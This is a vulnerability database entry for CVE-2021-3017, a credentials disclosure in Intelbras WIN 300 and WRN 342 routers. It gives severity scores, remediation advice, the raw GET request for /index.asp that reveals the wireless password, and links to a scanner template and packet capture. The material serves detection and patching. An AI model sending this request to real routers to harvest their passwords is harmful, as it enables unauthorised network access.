🔙 목록으로 돌아가기

CVE-2021-3017: Intelbras WIN 300/WRN 342 - Credentials Disclosure

TitleIntelbras WIN 300/WRN 342 - Credentials Disclosure
Authorpikpikcu
SeverityHigh
ImpactAn attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network.
RemediationUpdate the router firmware to the latest version, which includes a fix for the vulnerability.
CVSS Score7.5
EPSS Score0.68784
CVE IDCVE-2021-3017
Tags cve2021 cve exposure router intelbras vuln

🔍 Vulnerability Description

Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.

🌐 HTTP Request

GET /index.asp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3017.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-3017.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A